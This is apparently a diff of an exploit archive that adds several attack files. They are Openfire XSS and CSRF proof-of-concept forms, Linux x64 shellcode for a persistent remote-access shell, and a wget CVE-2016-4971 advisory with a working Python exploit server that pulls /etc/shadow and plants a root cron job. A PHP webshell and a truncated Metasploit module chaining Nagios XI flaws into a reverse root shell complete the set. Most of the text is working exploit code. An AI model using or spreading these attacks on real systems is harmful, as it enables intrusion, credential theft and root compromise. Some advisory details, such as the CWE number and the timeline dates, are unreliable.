curl "http://OpenFireServerIP:9090/plugins/search/advance-user-search.jsp?search=true&moreOptions=false&criteria=admin%22/%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E&search=Search" --cookie="JSESSIONID=XXX"
```
The folling code allows exploiting the vulnerability:
```
<iframe style="display:none" name="xss-frame"></iframe>
<form id="xss-form" action="http://OpenFireServerIP:9090/plugins/search/search-props-edit-form.jsp?save" method="post" target="xss-frame" >
<input type="text" name="searchEnabled" value="true" >
<input type="text" name="searchname" value="search%22/><script>alert('XSS')</script>" >
<input type="text" name="groupOnly" value="false" >
</form>
<script>document.getElementById("xss-form").submit()</script>
```
#### *propValue* variable from *server-properties.jsp*
The following curl command allows reproducing the attack against the Openfire *server-properties.jsp* page:
```
curl --data="propName=adminConsole.port&propValue=9090%22+onmouseover%3D%22alert%28%27xxs%27%29%22+x%3D%22&encrypt=false&save=Save+Property" http://OpenFireServerIP:9090/server-properties.jsp --cookie="JSESSIONID=XXX"
```
The folling code allows exploiting the vulnerability:
```
<iframe style="display:none" name="xss-frame"></iframe>
<form id="xss-form" action="http://OpenFireServerIP:9090/server-properties.jsp" method="post" target="xss-frame" >
<input type="text" name="propValue" value="=adminConsole.port" >
<input type="text" name="searchname" value="9090%22 onmouseover=%22alert('XSS')%22 x="/>
<input type="text" name="encrypt" value="false" >
<input type="text" name="save" value="Save Property" >
</form>
<script>document.getElementById("xss-form").submit()</script>
```
###Affected versions
* Version 4.0.0 and 4.0.1
## Several CSRF Vulnerabilities identified in Openfire 3.10.2
**Access Vector**: remote
**Security Risk**: low
**Vulnerability**: CWE-312
**CVSS Base Score**: 5.4
[comment]: https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N/E:F/RL:O
### Vulnerability Description
Several CSRF vulnerabilities have been found on different pages of the admin panel of the OpenFire web server. Throught this attack an attacker could drive a valid user to execute unwittingly a request on the OpenFire sever.
### Proof of Concept
#### *connection-settings-external-components.jsp* page is vulerable to a CSRF attack.
The following HTML iframe command allows reproducing the attack against the Openfire *dwr/exec/downloader.installPlugin.dwr* page:
```
<iframe style="display:none" name="csrf-frame"></iframe>
<form id="csrf-form" action="http://OpenFireServerIP:9090/dwr/exec/downloader.installPlugin.dwr" method="post" target="csrf-frame" >
<input type="text" name="callCount" value="1" >
<input type="text" name="c0-scriptName" value="downloader" >
<input type="text" name="c0-methodName" value="installPlugin" >
<input type="text" name="c0-id" value="9033_1444939787005" >
<input type="text" name="c0-param0" value="string:http://www.igniterealtime.org/projects/openfire/plugins/broadcast.jar" >
<input type="text" name="c0-param1" value="string:8221154" >
<input type="text" name="xml" value="true" >
</form>
<script>document.getElementById("csrf-form").submit()</script>
```
#### *client-connections-settings.jsp* is vulerable to a CSRF attack.
The following HTML iframe command allows reproducing the attack against the Openfire *client-connections-settings.jsp* page:
```
<iframe style="display:none" name="csrf-frame"></iframe>
<form id="csrf-form" action="http://OpenFireServerIP:9090/client-connections-settings.jsp" method="post" target="csrf-frame" >
<input type="text" name="port" value="5222" >
<input type="text" name="sslEnabled" value="false" >
<input type="text" name="sslPort" value="5223" >
<input type="text" name="idleDisco" value="true" >
<input type="text" name="clientIdle" value="360" >
<input type="text" name="pingIdleClients" value="true" >
<input type="text" name="update" value="Save Settings" >
</form>
<script>document.getElementById("csrf-form").submit()</script>
```
#### *manage-updates.jsp* is vulerable to a CSRF attack.
The following HTML iframe command allows reproducing the attack against the *Openfire manage-updates.jsp* page:
```
<iframe style="display:none" name="csrf-frame"></iframe>
<form id="csrf-form" action="http://OpenFireServerIP:9090/manage-updates.jsp" method="post" target="csrf-frame" >
<input type="text" name="serviceEnabled" value="false" >
<input type="text" name="notificationsEnabled" value="false" >
<input type="text" name="proxyEnabled" value="true" >
<input type="text" name="proxyHost" value="10.0.0.1" >
<input type="text" name="proxyPort" value="6666" >
<input type="text" name="update" value="Save Settings" >
</form>
<script>document.getElementById("csrf-form").submit()</script>
```
#### *plugin-admin.jsp* is vulerable to a CSRF attack.
The following HTML iframe command allows reproducing the attack against the Openfire *plugin-admin.jsp* page.
```
<iframe style="display:none" name="csrf-frame"></iframe>
<form id="csrf-form" action="http://OpenFireServerIP:9090/plugin-admin.jsp" method="get" target="csrf-frame" >
<input type="text" name="deleteplugin" value="broadcast" >
</form>
<script>document.getElementById("csrf-form").submit()</script>
```
The following HTML iframe command allows reproducing the attack against the Openfire *reg-settings.jsp* page:
```
<iframe style="display:none" name="csrf-frame"></iframe>
<form id="csrf-form" action="http://OpenFireServerIP:9090/reg-settings.jsp" method="get" target="csrf-frame" >
<input type="text" name="inbandEnabled" value="false" >
<input type="text" name="canChangePassword" value="false" >
<input type="text" name="anonLogin" value="fasle" >
<input type="text" name="allowedIPs" value="0.0.0.0" >
<input type="text" name="allowedAnonymIPs" value="0.0.0.0" >
<input type="text" name="save" value="Save Settings" >
</form>
<script>document.getElementById("csrf-form").submit()</script>
```
#### *server-properties.jsp* is vulerable to a CSRF attack.
The following HTML iframe command allows reproducing the attack against the Openfire *server-properties.jsp* admin page.
```
<iframe style="display:none" name="csrf-frame"></iframe>
<form id="csrf-form" action="http://OpenFireServerIP:9090/server-properties.jsp" method="post" target="csrf-frame" >
<input type="text" name="propName" value="test" >
<input type="text" name="propValue" value="test" >
<input type="text" name="encrypt" value=""false >
<input type="text" name="save" value="Save Property" >
</form>
<script>document.getElementById("csrf-form").submit()</script>
```
#### *system-email.jsp* is vulerable to a CSRF attack.
The following HTML iframe command allows reproducing the attack against the Openfire *system-email.jsp* admin page.
```
<iframe style="display:none" name="csrf-frame"></iframe>
<form id="csrf-form" action="http://OpenFireServerIP:9090/system-email.jsp" method="post" target="csrf-frame" >
<input type="text" name="host" value="mail.google.com" >
<input type="text" name="port" value="25" >
<input type="text" name="debug" value="false" >
<input type="text" name="server_username" value="toto" >
<input type="text" name="server_password" value="toto" >
<input type="text" name="save" value="Save Changes" >
</form>
```
### Affected versions
* Version >= 3.10.2 and < 4.0.0
## Several CSRF Vulnerabilities identified in Openfire 3.10.2
**Access Vector**: remote
**Security Risk**: low
**Vulnerability**: CWE-312
**CVSS Base Score**: 5.4
[comment]: https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N/E:F/RL:O
### Vulnerability Description
Several CSRF vulnerabilities have been found on different pages of the admin panel of the OpenFire web server. Through this attack, an attacker could drive a valid user to execute unwittingly a request to the OpenFire sever.
These vulnerabilities have already been found by hyp3rlinx, but had not been patched yet.
### Proof of Concept
#### *connection-settings-external-components.jsp* is vulerable to a CSRF attack.
The following HTML iframe command allows reproducing the attack against the Openfire *dwr/exec/downloader.installPlugin.dwr* page:
```
<iframe style="display:none" name="csrf-frame"></iframe>
<form id="csrf-form" action="http://OpenFireServerIP:9090/user-create.jsp" method="get" target="csrf-frame" >
<input type="text" name="name" value="Evil" >
<input type="text" name="email" value="evil@evil.f" >
<input type="text" name="password" value="evil" >
<input type="text" name="passwordConfirm" value="evil" >
<input type="text" name="create" value="Create+User" >
</form>
<script>document.getElementById("csrf-form").submit()</script>
```
#### *client-connections-settings.jsp* is vulerable to a CSRF attack.
The following HTML iframe command allows reproducing the attack against the Openfire *client-connections-settings.jsp* page.
```
<iframe style="display:none" name="csrf-frame"></iframe>
<form id="csrf-form" action="http://OpenFireServerIP:9090/user-password.jsp" method="post" target="csrf-frame" >
<input type="text" name="username" value="victim" >
<input type="text" name="password" value="evil" >
<input type="text" name="passwordConfirm" value="evil" >
<input type="text" name="update" value="Update+Password" >
</form>
<script>document.getElementById("csrf-form").submit()</script>
```
### Affected versions
* Version 4.0.0 and 4.0.1
## Sensitive information disclosure in OpenFire Server <=3.10.2
**Access Vector**: remote
**Security Risk**: low
**Vulnerability**: CWE-200
**CVSS Base Score**: 5.5
[comment]: https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:L/A:N/E:F/RL:O
### Vulnerability Description
A sensitive information disclosure vulnerabilty is present in the page *system-email.jsp*. It allow's an authenticated user to retreive the md5 hash the password of an email account.
### Vulnerable code
The following HTML code is reveived by an authenticated user on the page system-email.jsp. The md5 hash of the password is sent to the user.
```
<tr>
<td nowrap>
Server Username (Optional):
</td>
<td nowrap>
<input type="text" name="server_username" value="myusername" size="40" maxlength="150">
</td>
</tr>
<tr>
<td nowrap>
Server Password (Optional):
</td>
<td nowrap>
<input type="password" name="server_password" value="34819d7beeabb9260a5c854bc85b3e44" size="40" maxlength="150">
</td>
</tr>
```
### Affected versions
* Version >=3.10.2 and <4.0.2
### Fixes
* https://github.com/igniterealtime/Openfire/pull/570
### Solution
Update to version 4.0.2
### Timeline (dd/mm/yyyy)
* 15/10/2014 : Initial discovery
* 19/10/2015 : Contact with vendor team
* 27/11/2014 : vendor fixes vulnerabilities
* 27/11/2014 : vendor releases version 4.0.2, which includes the fixes
## Credits
* Florian Nivette <f.nivette@sysdream.com>
-- SYSDREAM Labs <labs@sysdream.com> GPG : 47D1 E124 C43E F992 2A2E 1551 8EB4 8CD9 D5B2 59A1 * Website: https://sysdream.com/ * Twitter: @sysdream

81
platforms/lin_x86-64/shellcode/40061.c Executable file
View file

@ -0,0 +1,81 @@
#include <stdio.h>
#include <string.h>
// Exploit Title: [Linux 64bit Ncat + SSL + MultiChannel + Persistant + Fork + IPv4/6 + Password 176byte]
// Date: [7/5/2016]
// Exploit Author: [CripSlick]
// Tested on: [Kali 2.0]
// Version: [Ncat: Version 7.01]
// ShepherdDowling@gmail.com
// OffSec ID: OS-20614
// http://50.112.22.183/
//---------------------------------------------------------------------------------
// ALERT TO SETTINGS: If Fork is ON and MultiChannel is ON, you will need to either
// kill the PID or restart the computer in order to remove the RAT. That is why
// password and encryption is VERY important here.
//---------------------------------------------------------------------------------
// Default Use
// ncat --ssl -6 1000::66 9999 --proxy-auth creepin[:LaCrips] -v
// Any Use
// ncat --ssl -(4/6) (IPv4/IPv6) <port> --proxy-auth <username>[:<password>] -v
//---------------------------------------------------------------------------------
// Internet Protocol Version
// IPv6 = \x36
// IPv4 = \x34
#define IP "\x36"
// Username (Any Byte Size)
#define Username "\x63\x72\x65\x65\x70\x69\x6e"
// Password (Any Byte Size)
#define Password "\x4c\x61\xee\x43\x72\x69\x70\x73\x5d"
// Port (4 bytes)
// ascii (from 0 to 9) = 30, 31, 32, 33, 34, 35, 36, 37, 38, 39
#define Port "\x39\x39\x39\x39"
// MultiChannel & Non-Ceasing (persistant until terminal close unless Fork is on)
// on = \x6b
// off = \x76
#define MultiChannel "\x6b"
// Fork allows the program to run after terminal close (I suggest MultiChannel on)
// Fork helps when linking payload to an innocuous program
// comment the fork out if you don't want it
#define Fork "\x6a\x39\x58\x48\x31\xff\x0f\x05\x48\x31\xff\x48\x39\xf8\x74\x08\x48\x31\xc0\x6a\x3c\x58\x0f\x05"
unsigned char code[] =
"\x48\x31\xff\x48\xf7\xe7"Fork
"\x68\x2f\x6e\x63\x61\xc6\x44\x24\x04\x74\x48\xbf\x2f\x75\x73\x72\x2f\x62\x69\x6e\x57\x48\x89\xe7\x50\x68\x2d\x2d\x73\x73\xc6\x44\x24\x04\x6c\x49\x89\xe6\x50\x49\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x41\x57\x49\x89\xe7\x68\x2d"MultiChannel"\x76\x65\x49\x89\xe3\xeb\x3b\x48\x89\xe3\x68\x61\x75\x74\x68\x48\xb9\x2d\x2d\x70\x72\x6f\x78\x79\x2d\x51\x48\x89\xe1\x68"Port"\x49\x89\xe5\x68\x2d\x6c"IP"\x70\x49\x89\xe2\x50\x41\x56\x41\x57\x41\x53\x53\x51\x41\x55\x41\x52\x57\x48\x89\xe6\xb0\x3b\x0f\x05\xe8\xc0\xff\xff\xff"Username"\x5b\x3a"Password
;
int main ()
{
// I make sure there are no nulls
// The string count will terminate at the first \x00
printf("The Shellcode is %d Bytes Long\n", strlen(code));
// Next I throw 0xAAAAAAAA into every register before shellcode execution
// This ensures that the shellcode will run in any circumstance
__asm__("mov $0xAAAAAAAAAAAAAAAA, %rax\n\t"
"mov %rax, %rbx\n\t" "mov %rax, %rcx\n\t" "mov %rax, %rdx\n\t"
"mov %rax, %rsi\n\t" "mov %rax, %rdi\n\t" "mov %rax, %rbp\n\t"
"mov %rax, %r10\n\t" "mov %rax, %r11\n\t" "mov %rax, %r12\n\t"
"mov %rax, %r13\n\t" "mov %rax, %r14\n\t" "mov %rax, %r15\n\t"
"call code");
return 0;
}

495
platforms/linux/remote/40064.txt Executable file
View file

@ -0,0 +1,495 @@
=============================================
- Release date: 06.07.2016
- Discovered by: Dawid Golunski
- Severity: High
- CVE-2016-4971
=============================================
I. VULNERABILITY
-------------------------
GNU Wget < 1.18 Arbitrary File Upload / Potential Remote Code Execution
II. BACKGROUND
-------------------------
"GNU Wget is a free software package for retrieving files using HTTP, HTTPS and
FTP, the most widely-used Internet protocols.
It is a non-interactive commandline tool, so it may easily be called from
scripts, cron jobs, terminals without X-Windows support, etc.
GNU Wget has many features to make retrieving large files or mirroring entire
web or FTP sites easy
"
https://www.gnu.org/software/wget/
III. INTRODUCTION
-------------------------
GNU Wget before 1.18 when supplied with a malicious URL (to a malicious or
compromised web server) can be tricked into saving an arbitrary remote file
supplied by an attacker, with arbitrary contents and filename under
the current directory and possibly other directories by writing to .wgetrc.
Depending on the context in which wget is used, this can lead to remote code
execution and even root privilege escalation if wget is run via a root cronjob
as is often the case in many web application deployments.
The vulnerability could also be exploited by well-positioned attackers within
the network who are able to intercept/modify the network traffic.
IV. DESCRIPTION
-------------------------
Because of lack of sufficient controls in wget, when user downloads a file
with wget, such as:
wget http://attackers-server/safe_file.txt
an attacker who controls the server could make wget create an arbitrary file
with an arbitrary contents and filename by issuing a crafted HTTP 30X Redirect
containing FTP server reference in response to the victim's wget request.
For example, if the attacker's server replies with the following response:
HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Location: ftp://attackers-server/.bash_profile
Content-Length: 262
Server: Apache
wget will automatically follow the redirect and will download a malicious
.bash_profile file from a malicious FTP server.
It will fail to rename the file to the originally requested filename of
'safe_file.txt' as it would normally do, in case of a redirect to another
HTTP resource with a different name.
Because of this vulnerability, an attacker is able to upload an arbitrary file
with an arbitrary filename to the victim's current directory.
Execution flow:
victim@trusty:~$ wget --version | head -n1
GNU Wget 1.17 built on linux-gnu.
victim@trusty:~$ pwd
/home/victim
victim@trusty:~$ ls
victim@trusty:~$
victim@trusty:~$ wget http://attackers-server/safe-file.txt
Resolving attackers-server... 192.168.57.1
Connecting to attackers-server|192.168.57.1|:80... connected.
HTTP request sent, awaiting response... 302 Found
Location: ftp://192.168.57.1/.bash_profile [following]
=> ‘.bash_profile’
Connecting to 192.168.57.1:21... connected.
Logging in as anonymous ... Logged in!
==> SYST ... done. ==> PWD ... done.
==> TYPE I ... done. ==> CWD not needed.
==> SIZE .bash_profile ... 55
==> PASV ... done. ==> RETR .bash_profile ... done.
Length: 55 (unauthoritative)
.bash_profile 100%[=============================================================================================>] 55 --.-KB/s in 0s
2016-02-19 04:50:37 (1.27 MB/s) - ‘.bash_profile’ saved [55]
victim@trusty:~$ ls -l
total 4
-rw-rw-r-- 1 victim victim 55 Feb 19 04:50 .bash_profile
victim@trusty:~$
This vulnerability will not work if extra options that force destination
filename are specified as a paramter. Such as: -O /tmp/output
It is however possible to exploit the issue with mirroring/recursive options
enabled such as -r or -m.
Another limitation is that attacker exploiting this vulnerability can only
upload his malicious file to the current directory from which wget was run,
or to a directory specified by -P option (directory_prefix option).
This could however be enough to exploit wget run from home directory, or
within web document root (in which case attacker could write malicious php files
or .bash_profile files).
The current directory limitation could also be bypassed by uploading a .wgetrc
config file if wget was run from a home directory.
By saving .wgetrc in /home/victim/.wgetrc an attacker could set arbitrary wget
settings such as destination directory for all downloaded files in future,
as well as set a proxy setting to make future requests go through a malicious
proxy server belonging to the attackers to which they could send further
malicious responses.
Here is a set of Wget settings that can be helpful to an attacker:
dir_prefix = string
Top of directory tree—the same as ‘-P string’.
post_file = file
Use POST as the method for all HTTP requests and send the contents of file in the request body. The same as ‘--post-file=file’.
recursive = on/off
Recursive on/off—the same as ‘-r’.
timestamping = on/off
Allows to overwrite existing files.
cut_dirs = n
Ignore n remote directory components. Allows attacker to create directories with wget (when combined with recursive option).
http_proxy
HTTP Proxy server
https_proxy
HTTPS Proxy server
output_document = file
Set the output filename—the same as ‘-O file’.
input = file
Read the URLs from string, like ‘-i file’.
metalink-over-http
Issues HTTP HEAD request instead of GET and extracts Metalink metadata from response headers.
Then it switches to Metalink download. If no valid Metalink metadata is found, it falls back to ordinary HTTP download.
Full list of .wgetrc options can be found in:
https://www.gnu.org/software/wget/manual/wget.html#Wgetrc-Commands
V. PROOF OF CONCEPT EXPLOIT
-------------------------
1) Cronjob with wget scenario
Often wget is used inside cronjobs. By default cronjobs run within home
directory of the cronjob owner.
Such wget cronjobs are commonly used with many applications used to download
new version of databases, requesting web scripts that perform scheduled tasks
such as rebuilding indexes, cleaning caches etc.
Here are a few example tutorials for Wordpress/Moodle/Joomla/Drupal found on
the Internet with exploitable wget cronjobs:
https://codex.wordpress.org/Post_to_your_blog_using_email
https://docs.moodle.org/2x/ca/Cron
http://www.joomlablogger.net/joomla-tips/joomla-general-tips/how-to-set-up-a-content-delivery-network-cdn-for-your-joomla-site
http://www.zyxware.com/articles/4483/drupal-how-to-add-a-cron-job-via-cpanel
Such setup could be abused by attackers to upload .bash_profile file through
wget vulnerability and run commands in the context of the victim user upon
their next log-in.
As cron runs priodically attackers, could also write out .wgetrc file in the
first response and then write to /etc/cron.d/malicious-cron in the second.
If a cronjob is run by root, this would give them an almost instant root code
execution.
It is worth noting that if an attacker had access to local network they could
potentially modify unencrypted HTTP traffic to inject malicious 30X Redirect
responses to wget requests.
This issue could also be exploited by attackers who have already gained
access to the server through a web vulnerability to escalate their privileges.
In many cases the cron jobs (as in examples above) are set up to request
various web scripts e.g:
http://localhost/clean-cache.php
If the file was writable by apache, and attacker had access to www-data/apache
account, they could modify it to return malicious Location header and exploit
root cronjob that runs the wget request in order to escalate their privileges
to root.
For simplicity we can assume that attacker already has control over the server
that the victim sends the request to with wget.
The root cronjob on the victim server may look as follows:
root@victim:~# cat /etc/cron.d/update-database
# Update database file every 2 minutes
*/2 * * * * root wget -N http://attackers-server/database.db > /dev/null 2>&1
In order to exploit this setup, attacker first prepares a malicious .wgetrc
and starts an FTP server:
attackers-server# mkdir /tmp/ftptest
attackers-server# cd /tmp/ftptest
attackers-server# cat <<_EOF_>.wgetrc
post_file = /etc/shadow
output_document = /etc/cron.d/wget-root-shell
_EOF_
attackers-server# sudo pip install pyftpdlib
attackers-server# python -m pyftpdlib -p21 -w
At this point attacker can start an HTTP server which will exploit wget by
sending malicious redirects to the victim wget's requests:
---[ wget-exploit.py ]---
#!/usr/bin/env python
#
# Wget 1.18 < Arbitrary File Upload Exploit
# Dawid Golunski
# dawid( at )legalhackers.com
#
# http://legalhackers.com/advisories/Wget-Arbitrary-File-Upload-Vulnerability-Exploit.txt
#
# CVE-2016-4971
#
import SimpleHTTPServer
import SocketServer
import socket;
class wgetExploit(SimpleHTTPServer.SimpleHTTPRequestHandler):
def do_GET(self):
# This takes care of sending .wgetrc
print "We have a volunteer requesting " + self.path + " by GET :)\n"
if "Wget" not in self.headers.getheader('User-Agent'):
print "But it's not a Wget :( \n"
self.send_response(200)
self.end_headers()
self.wfile.write("Nothing to see here...")
return
print "Uploading .wgetrc via ftp redirect vuln. It should land in /root \n"
self.send_response(301)
new_path = '%s'%('ftp://anonymous@%s:%s/.wgetrc'%(FTP_HOST, FTP_PORT) )
print "Sending redirect to %s \n"%(new_path)
self.send_header('Location', new_path)
self.end_headers()
def do_POST(self):
# In here we will receive extracted file and install a PoC cronjob
print "We have a volunteer requesting " + self.path + " by POST :)\n"
if "Wget" not in self.headers.getheader('User-Agent'):
print "But it's not a Wget :( \n"
self.send_response(200)
self.end_headers()
self.wfile.write("Nothing to see here...")
return
content_len = int(self.headers.getheader('content-length', 0))
post_body = self.rfile.read(content_len)
print "Received POST from wget, this should be the extracted /etc/shadow file: \n\n---[begin]---\n %s \n---[eof]---\n\n" % (post_body)
print "Sending back a cronjob script as a thank-you for the file..."
print "It should get saved in /etc/cron.d/wget-root-shell on the victim's host (because of .wgetrc we injected in the GET first response)"
self.send_response(200)
self.send_header('Content-type', 'text/plain')
self.end_headers()
self.wfile.write(ROOT_CRON)
print "\nFile was served. Check on /root/hacked-via-wget on the victim's host in a minute! :) \n"
return
HTTP_LISTEN_IP = '192.168.57.1'
HTTP_LISTEN_PORT = 80
FTP_HOST = '192.168.57.1'
FTP_PORT = 21
ROOT_CRON = "* * * * * root /usr/bin/id > /root/hacked-via-wget \n"
handler = SocketServer.TCPServer((HTTP_LISTEN_IP, HTTP_LISTEN_PORT), wgetExploit)
print "Ready? Is your FTP server running?"
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
result = sock.connect_ex((FTP_HOST, FTP_PORT))
if result == 0:
print "FTP found open on %s:%s. Let's go then\n" % (FTP_HOST, FTP_PORT)
else:
print "FTP is down :( Exiting."
exit(1)
print "Serving wget exploit on port %s...\n\n" % HTTP_LISTEN_PORT
handler.serve_forever()
---[ eof ]---
Attacker can run wget-exploit.py and wait a few minutes until the victim's server executes
the aforementioned cronjob with wget.
The output should look similar to:
---[ wget-exploit.py output ]---
attackers-server# python ./wget-exploit.py
Ready? Is your FTP server running?
FTP found open on 192.168.57.1:21. Let's go then
Serving wget exploit on port 80...
We have a volunteer requesting /database.db by GET :)
Uploading .wgetrc via ftp redirect vuln. It should land in /root
192.168.57.10 - - [26/Feb/2016 15:03:54] "GET /database.db HTTP/1.1" 301 -
Sending redirect to ftp://anonymous@192.168.57.1:21/.wgetrc
We have a volunteer requesting /database.db by POST :)
Received POST from wget, this should be the extracted /etc/shadow file:
---[begin]---
root:$6$FsAu5RlS$b2J9GDm.....cut......9P19Nb./Y75nypB4FXXzX/:16800:0:99999:7:::
daemon:*:16484:0:99999:7:::
bin:*:16484:0:99999:7:::
sys:*:16484:0:99999:7:::
sync:*:16484:0:99999:7:::
games:*:16484:0:99999:7:::
man:*:16484:0:99999:7:::
lp:*:16484:0:99999:7:::
...cut...
---[eof]---
Sending back a cronjob script as a thank-you for the file...
It should get saved in /etc/cron.d/wget-root-shell on the victim's host (because of .wgetrc we injected in the GET first response)
192.168.57.10 - - [26/Feb/2016 15:05:54] "POST /database.db HTTP/1.1" 200 -
File was served. Check on /root/hacked-via-wget on the victim's host in a minute! :)
---[ output eof ]---
As we can see .wgetrc got uploaded by the exploit. It has set the post_file
setting to /etc/shadow.
Therefore, on the next wget run, wget sent back shadow file to the attacker.
It also saved the malicious cronjob script (ROOT_CRON variable) which should
create a file named /root/hacked-via-wget, which we can verify on the victim's
server:
root@victim:~# cat /etc/cron.d/wget-root-shell
* * * * * root /usr/bin/id > /root/hacked-via-wget
root@victim:~# cat /root/hacked-via-wget
uid=0(root) gid=0(root) groups=0(root)
2) PHP web application scenario
If wget is used within a PHP script e.g.:
<?php
// Update geoip data
system("wget -N -P geoip http://attackers-host/goeip.db");
?>
An attacker who manages to respond to the request could simply upload a PHP
backdoor of:
<?php
//webshell.php
system($_GET['cmd']);
?>
by using the wget-exploit script described in example 1.
After the upload he could simply execute the script and their shell
command by a GET request to:
http://victims-php-host/geoip/webshell.php?cmd=id
VI. BUSINESS IMPACT
-------------------------
Affected versions of wget that connect to untrusted (or compromised) web
servers could be tricked into uploading a file under an arbitrary name, or
even path (if wget is run from a home directory).
Depending on the context in which wget is used, this could lead to
uploading a web shell and granting the attacker access remote access to the
system, or privilege escalation. It could be possible for attackers to escalate
to root user if wget is run via root cronjob as it is often the case in web
application deployments and is recommended in some guides on the Internet.
The vulnerability could also be exploited by well-positioned attackers within
the networ who are able to intercept/modify the network traffic.
VII. SYSTEMS AFFECTED
-------------------------
All versions of Wget before the patched version of 1.18 are affected.
VIII. SOLUTION
-------------------------
Update to wget version 1.18 as advertised by the vendor at:
http://lists.gnu.org/archive/html/info-gnu/2016-06/msg00004.html
Linux distributions should update their wget packages. It is recommended
to update wget manually if an updated package is not available for your
distribution.
IX. REFERENCES
-------------------------
http://legalhackers.com
http://legalhackers.com/advisories/Wget-Arbitrary-File-Upload-Vulnerability-Exploit.txt
http://lists.gnu.org/archive/html/info-gnu/2016-06/msg00004.html
http://www.ubuntu.com/usn/usn-3012-1/
https://bugzilla.redhat.com/show_bug.cgi?id=1343666#c1
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4971
X. CREDITS
-------------------------
The vulnerability has been discovered by Dawid Golunski
dawid (at) legalhackers (dot) com
legalhackers.com
XI. REVISION HISTORY
-------------------------
06.07.2016 - Advisory released
XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with
no warranties or guarantees of fitness of use or otherwise. I accept no
responsibility for any damage caused by the use or misuse of this information.

275
platforms/linux/remote/40067.rb Executable file
View file

@ -0,0 +1,275 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Nagios XI Chained Remote Code Execution',
'Description' => %q{
This module exploits an SQL injection, auth bypass, file upload,
command injection, and privilege escalation in Nagios XI <= 5.2.7
to pop a root shell.
},
'Author' => [
'Francesco Oddo', # Vulnerability discovery
'wvu' # Metasploit module
],
'References' => [
['EDB', '39899']
],
'DisclosureDate' => 'Mar 6 2016',
'License' => MSF_LICENSE,
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Privileged' => true,
'Payload' => {
'Compat' => {
'PayloadType' => 'cmd cmd_bash',
'RequiredCmd' => 'generic bash-tcp php perl python openssl gawk'
}
},
'Targets' => [
['Nagios XI <= 5.2.7', version: Gem::Version.new('5.2.7')]
],
'DefaultTarget' => 0,
'DefaultOptions' => {
'PAYLOAD' => 'cmd/unix/reverse_bash',
'LHOST' => Rex::Socket.source_address
}
))
end
def check
res = send_request_cgi!(
'method' => 'GET',
'uri' => '/nagiosxi/'
)
return unless res && (html = res.get_html_document)
if (version = html.at('//input[@name = "version"]/@value'))
vprint_status("Nagios XI version: #{version}")
if Gem::Version.new(version) <= target[:version]
return CheckCode::Appears
end
end
CheckCode::Safe
end
def exploit
if check != CheckCode::Appears
fail_with(Failure::NotVulnerable, 'Vulnerable version not found! punt!')
end
print_status('Getting API token')
get_api_token
print_status('Getting admin cookie')
get_admin_cookie
print_status('Getting monitored host')
get_monitored_host
print_status('Downloading component')
download_profile_component
print_status('Uploading root shell')
upload_root_shell
print_status('Popping shell!')
pop_dat_shell
end
#
# Cleanup methods
#
def on_new_session(session)
super
print_status('Cleaning up...')
commands = [
'rm -rf ../profile',
'unzip -qd .. ../../../../tmp/component-profile.zip',
'chown -R nagios:nagios ../profile',
"rm -f ../../../../tmp/component-#{zip_filename}"
]
commands.each do |command|
vprint_status(command)
session.shell_command_token(command)
end
end
#
# Exploit methods
#
def get_api_token
res = send_request_cgi(
'method' => 'GET',
'uri' => '/nagiosxi/includes/components/nagiosim/nagiosim.php',
'vars_get' => {
'mode' => 'resolve',
'host' => '\'AND(SELECT 1 FROM(SELECT COUNT(*),CONCAT((' \
'SELECT backend_ticket FROM xi_users WHERE user_id=1' \
'),FLOOR(RAND(0)*2))x ' \
'FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- '
}
)
if res && res.body =~ /Duplicate entry '(.*?).'/
@api_token = $1
vprint_good("API token: #{@api_token}")
else
fail_with(Failure::UnexpectedReply, 'API token not found! punt!')
end
end
def get_admin_cookie
res = send_request_cgi(
'method' => 'GET',
'uri' => '/nagiosxi/rr.php',
'vars_get' => {
'uid' => "1-#{Rex::Text.rand_text_alpha(8)}-" +
Digest::MD5.hexdigest(@api_token)
}
)
if res && (@admin_cookie = res.get_cookies.split('; ').last)
vprint_good("Admin cookie: #{@admin_cookie}")
get_csrf_token(res.body)
else
fail_with(Failure::NoAccess, 'Admin cookie not found! punt!')
end
end
def get_csrf_token(body)
if body =~ /nsp_str = "(.*?)"/
@csrf_token = $1
vprint_good("CSRF token: #{@csrf_token}")
else
fail_with(Failure::UnexpectedReply, 'CSRF token not found! punt!')
end
end
def get_monitored_host
res = send_request_cgi(
'method' => 'GET',
'uri' => '/nagiosxi/ajaxhelper.php',
'cookie' => @admin_cookie,
'vars_get' => {
'cmd' => 'getxicoreajax',
'opts' => '{"func":"get_hoststatus_table"}',
'nsp' => @csrf_token
}
)
return unless res && (html = res.get_html_document)
if (@monitored_host = html.at('//div[@class = "hostname"]/a/text()'))
vprint_good("Monitored host: #{@monitored_host}")
else
fail_with(Failure::UnexpectedReply, 'Monitored host not found! punt!')
end
end
def download_profile_component
res = send_request_cgi(
'method' => 'GET',
'uri' => '/nagiosxi/admin/components.php',
'cookie' => @admin_cookie,
'vars_get' => {
'download' => 'profile'
}
)
if res && res.body =~ /^PK\x03\x04/
@profile_component = res.body
else
fail_with(Failure::UnexpectedReply, 'Failed to download component! punt!')
end
end
def upload_root_shell
mime = Rex::MIME::Message.new
mime.add_part(@csrf_token, nil, nil, 'form-data; name="nsp"')
mime.add_part('1', nil, nil, 'form-data; name="upload"')
mime.add_part('1000000', nil, nil, 'form-data; name="MAX_FILE_SIZE"')
mime.add_part(payload_zip, 'application/zip', 'binary',
'form-data; name="uploadedfile"; ' \
"filename=\"#{zip_filename}\"")
res = send_request_cgi!(
'method' => 'POST',
